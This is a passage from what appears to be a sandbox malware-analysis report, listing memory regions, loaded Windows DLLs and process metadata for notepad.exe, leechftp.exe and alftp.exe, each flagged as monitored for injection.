mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4891 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4892 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4893 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4894 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4895 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4896 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4897 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4898 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4899 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4900 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4901 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4902 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4903 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4904 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4905 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4906 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 193 os_tid = 0x1220 Thread: id = 194 os_tid = 0x1190 Process: id = "36" image_name = "notepad.exe" filename = "c:\\program files (x86)\\reference assemblies\\notepad.exe" page_root = "0x10c64000" os_pid = "0x1164" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Reference Assemblies\\notepad.exe\" " cur_dir = "C:\\Program Files (x86)\\Reference Assemblies\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5003 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5004 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5005 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5006 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5007 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5008 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5009 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5010 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5011 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5012 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5013 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5014 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 5015 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5016 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5017 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5018 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 5019 start_va = 0x730000 end_va = 0x8b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 5020 start_va = 0x8c0000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 5021 start_va = 0xa50000 end_va = 0xb0bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 5022 start_va = 0xb40000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 5023 start_va = 0x1160000 end_va = 0x1176fff monitored = 0 entry_point = 0x11614a1 region_type = mapped_file name = "notepad.exe" filename = "\\Program Files (x86)\\Reference Assemblies\\notepad.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\notepad.exe") Region: id = 5024 start_va = 0x1180000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 5025 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5026 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5027 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5028 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 5029 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 5030 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 5031 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5032 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5033 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5034 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5035 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5036 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5037 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5038 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5039 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5040 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5041 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5042 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5043 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5044 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5045 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5046 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5047 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5048 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5049 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5050 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 195 os_tid = 0x122c Thread: id = 196 os_tid = 0x1168 Process: id = "37" image_name = "leechftp.exe" filename = "c:\\program files (x86)\\windows multimedia platform\\leechftp.exe" page_root = "0x1147a000" os_pid = "0x116c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\leechftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Multimedia Platform\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4955 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4956 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4957 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4958 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4959 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4960 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4961 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4962 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4963 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4964 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4965 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4966 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4967 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4968 start_va = 0x500000 end_va = 0x5bbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 4969 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 4970 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 4971 start_va = 0x870000 end_va = 0x9f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 4972 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 4973 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 4974 start_va = 0xeb0000 end_va = 0xebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 4975 start_va = 0x1000000 end_va = 0x1016fff monitored = 0 entry_point = 0x10014a1 region_type = mapped_file name = "leechftp.exe" filename = "\\Program Files (x86)\\Windows Multimedia Platform\\leechftp.exe" (normalized: "c:\\program files (x86)\\windows multimedia platform\\leechftp.exe") Region: id = 4976 start_va = 0x1020000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 4977 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4978 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4979 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4980 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4981 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4982 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4983 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4984 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4985 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4986 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4987 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4988 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4989 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4990 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4991 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4992 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4993 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4994 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4995 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4996 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4997 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4998 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4999 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5000 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5001 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5002 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 197 os_tid = 0x1228 Thread: id = 198 os_tid = 0x1170 Process: id = "38" image_name = "alftp.exe" filename = "c:\\program files\\windows multimedia platform\\alftp.exe" page_root = "0x1fc65000" os_pid = "0x1108" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Multimedia Platform\\alftp.exe\" " cur_dir = "C:\\Program Files\\Windows Multimedia Platform\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3851 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3852 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3853 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3854 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3855 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3856 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3857 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3858 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3859 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3860 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3861 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3862 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3863 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3864 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3865 start_va = 0x6e0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3866 start_va = 0x7e0000 end_va = 0x967fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 3867 start_va = 0x970000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 3868 start_va = 0xb70000 end_va = 0xb86fff monitored = 0 entry_point = 0xb714a1 region_type = mapped_file name = "alftp.exe" filename = "\\Program Files\\Windows Multimedia Platform\\alftp.exe" (normalized: "c:\\program files\\windows multimedia platform\\alftp.exe") Region: id = 3869 start_va = 0xb90000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 3870 start_va = 0x1f90000 end_va = 0x204bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f90000" filename = "" Region: id = 3871 start_va = 0x20a0000 